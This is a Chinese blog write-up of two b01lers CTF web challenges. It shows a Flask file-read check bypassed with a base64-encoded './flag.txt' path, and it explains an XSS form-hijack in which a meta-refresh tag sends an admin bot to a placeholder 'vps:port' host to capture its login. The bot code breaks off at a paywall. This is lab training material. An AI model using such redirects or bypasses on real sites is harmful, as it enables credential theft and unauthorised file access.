b01lers CTF web 复现

最新推荐文章于 2024-08-17 17:13:01 发布
最新推荐文章于 2024-08-17 17:13:01 发布
阅读量990 收藏 1
点赞数 1
分类专栏: 比赛复现 文章标签: 比赛复现
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/shinygod/article/details/129674842
版权

warmup

按照提示依次 base64 加密后访问,可以访问 ./flag.txt,也就是 Li9mbGFnLnR4dA==

from base64 import b64decode
import flask

app = flask.Flask(__name__)

@app.route('/<name>')
def index2(name):
    name = b64decode(name)
    if (validate(name)):
        return "This file is blocked!"
    try:
        file = open(name, 'r').read()
    except:
        return "File Not Found"
    return file

@app.route('/')
def index():
    return flask.redirect('/aW5kZXguaHRtbA==')

def validate(data):
    if data == b'flag.txt':
        return True
    return False


if __name__ == '__main__':
    app.run()

在这里插入图片描述

fishy-motd

这题考的是 xss 中的表单劫持,和一点点 csp 的绕过。

在页面中可以看到 default-src 'none'; 以及一些其他的限制,可以用 meta 标签来进行 url 重定向。

例如:这里面的 1 是延迟 1 秒后跳转。

<meta http-equiv="refresh" content="1;url=http://vps:port/">

题目的主要代码就是下面这段,机器人访问 login 页面模拟登录,且会在固定的位置输入账密,那么我们可以利用重定向到我们的 vps,在我们的 vps 中把它的 login 完整的 copy 下来,这样当机器人模拟登录的时候就会把账密输入到我们的 vps 上。

const adminBot = async (id) => {
   
    const browser = await puppeteer.launch({
   
        headless: true, // Uncomment below if the sandbox is causing issues
        // args: ['--no-sandbox', '--disable-setuid-sandbox', '--single-process']
    })
    const page = await browser.newPage();
    await page.setViewport({
    width: 800, height: 600 });
    const url = `http://localhost:${
     port}/login?motd=${
     id}`;
    await page.goto(url);
    await page.<
最低0.47元/天 解锁文章
XSS漏洞总结和漏洞复现
weixin_45492087的博客
07-28 2572
跨站脚本攻击XSS(CrossSiteScripting),为区别层叠样式表(CascadingStyleSheets,CSS),所以改写为XSS。
BUUCTF [b01lers2020]little_engine
weixin_53349587的博客
01-06 458
1.拿到文件,进入主函数: 这个是动调之前的主函数,开始动调: 其中,已知字符串已经给出,为unk_5617CE521220,一共300位: 进入加密函数sub_5608DAAB8510: 通过多次动态调试,得到了加密算法的逻辑。 看判断函数sub_5608DAAB85A0: 综上,写出加密脚本: a = [0xE1, 0xE6, 0xD0, 0x4A, 0xF2, 0xC3, 0x7E, 0xAA, 0xE6, 0xFC, 0x42, 0xB2, 0xF..
b01lers-ctf-2020:b01lers-ctf的公开发布文件
05-17
b01lers-ctf b01lers-ctf的公开发布文件。 您将找到以下目录: rev:Rev的挑战 pwn:Pwn挑战 加密:加密挑战 网络:网络挑战 杂项:其他挑战 分布式文件:我们在CTF期间分发供下载的tgz文件 以及比赛的比分牌。 所有挑战都应具有挑战文件,源代码以及编写和/或求解器。 如果没有,请创建一个github问题,我们将修复该问题。 如果您需要更多帮助,请随时与b01lers-ctf discord上的DM创建者联系。 没有承诺,他们会回应,我们很忙。
ctf web复现
m0_64815693的博客
05-07 846
ctf web复现
SECCON CTF 2022 web复现
shinygod的博客
11-20 860
SECCON CTF 2022 web复现
[vsCTF2022]web题目复现
cosmoslin的博客
07-13 1002
nodejs的eval命令执行,过滤了很多,利用 vsCAPTCHA 进入页面需要我们输入验证码根据图示:我们需要在每一轮也就是10s内正确输入验证码,总共输入正确1000次,验证码结果为两数相加抓包发现字段,是一段jwt,解码看一下猜测字段含义:第一种思路是将令牌中numCaptchasSolved的值更改为 1000,然后发送它来欺骗服务器,使其认为已经验证了1000次。但是,JWT 是经过签名的,尝试之后发现现有方法都不行,因此必须找到另一种方法。另一种思路是使用 OCR 来检索验证码的内容,但在如此
VNCTF2022 web复现
Pysnow's Blog
04-07 3178
web 文章目录webGameV4.0gocalc0easyJ4va信息收集获取key反序列化newcalc0非预期PoC 1PoC 2预期解InterestingPHP解法一解法二 GameV4.0 前端小游戏题,直接想到查看js源代码 在data.js文件中搜索到了关键词flag,且后面附着着一个base64编码的字符串,解码试试 得到flag,再将其url解码一下就行 VNCTF{Welcome_to_VNCTF2022} gocalc0 go语言的ssti,传入{{.}}指向当前的类,类似于
刷题记录之BUUCTF[b01lers2020]Welcome to Earth
SHININGENDING的博客
04-08 439
刷题记录之BUUCTF[b01lers2020]Welcome to Earth
b01lers-ctf-2020: 公开发布文件详解及资源目录
标题中提到的“b01lers-ctf-2020”指的是2020年b01lers团队组织的CTF(Capture The Flag,夺旗)竞赛。CTF是一种信息安全竞赛,参赛者需要解决一系列挑战,这些挑战通常分为多个领域,如逆向工程(Rev)、二进制漏洞...
[2022 ACTF]web题目复现
cosmoslin的博客
07-06 1835
查看dockerfile发现题目使用环境为goahead5.1.4,联想到p神对于该漏洞的复现记录,我们有两种方法解题:GoAhead环境变量注入复现踩坑记hack.c 编译 exp.py exp.py 简单看一下代码逻辑:server.js 整个题目通过websockets通信,当api为getflag时传入flagbot 这里发现admin登录没有任何限制,那么我们登录admin再传入getflag即可 原型链污染: xss: ToLeSion 考点: TLS-Poison 一篇文章带你读懂 TLS
MRCTF web部分复现wp
xlcvv的博客
04-05 760
一、ez_bypass 换个界面- 这个有点丑: GET两个参数:gg 和 id,md5值相同但本值不同,md5碰撞,之前有做过:,但是试了一些值都不行? 那就传入的为数组,md5()函数无法处理数组,如果传入数组,会返回NULL,所以两个数组经过加密后得到的都是NULL,也就是相等的。 显示出了You got the first steponly one way to get the fl...
crypto-crypto_crossword(b01lers ctf 2020)
耐酸碱高温固化材料近距离传输研究
11-26 1544
提示图片:看到这个题目大概的理解是需要完成一个5x5的填词游戏,填写的内容应该是和下方9个小题有关。
crypto-Harvesting Season(b01lers ctf 2020)
耐酸碱高温固化材料近距离传输研究
11-28 363
由于最终flag是以pctf四个字母开头,那么可以知道明文的前4个字节b’pctf’与密钥4个字节异或的结果就是密文前四个字节。反过来用密文前四个字节与b’pctf’进行异或,就能得到密钥key。推测本题要使用异或方式解密,密钥长度为4。有个信息比较可疑,此处应该就是密文。
crypto-dollar_lunch(b01lers ctf 2020)
耐酸碱高温固化材料近距离传输研究
12-28 646
一题比较特殊的RSA题,记录一下。已知N,phi,e解密
[b01lers CTF 2024] crypto/pwn 部分
weixin_52640415的博客
04-17 1266
类aes padding oracle; crt; GF(p)(1).nth_root(n,all=True)
XSS漏洞复现
最新发布
m0_65665796的博客
08-17 1370
不知道我是什么原因toLowerCase这个函数用不了,但是eval(mafia)我也可以利用,location的作用前面的关卡已经说到了,slice(1)从后往前截取第一个。我们看到这一关过滤了很多,最主要过滤了/alert/,但是他没有过滤大写,但是html是严格区分大小写的,这就很头疼,但是想到了官方给出了这么一个函数Function.结果发现并没有对28,29进行编码 ,是什么原因呢是不是把它当成一整字符串了,所以没有编码通过查资料得知payload,查了location的用法是。
[b01lers2020]Life on Mars
fightte的博客
05-24 974
界面如下,点击可以看到各种信息,讲的是火星上的事物: 扫描一遍,没有发现任何东西: 并没有备份文件,猜测可能是一些框架的注入之类的, 在各页面抓包查看是否有可疑传参: 某一个页面,看到有类似查询的参数: 传参的数据如果是地名,则显示json形式的页面信息,尝试注入: 通过这个形式显示,信息: 尝试: /query?search=amazonis_planitia union select version(),database() 将表名聚合在一起:爆出表名 对了,下面这是最常见的对没有过滤的s..
[b01lers2020]Welcome to Earth
qq_40327508的博客
11-28 967
一直自动跳转/die/页面,抓包尝试 查看chase目录 后面就一路找,但是没找到什么有用的信息 看了wp才知道,关键点在js文件中 /static/js/door.js 最后来到static/js/fight.js 重新排序flag即可 from itertools import permutations flag = ["{hey", "_boy", "aaaa", "s_im", "ck!}", "_baa", "aaaa", "pctf"] item = permutations(flag) f
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值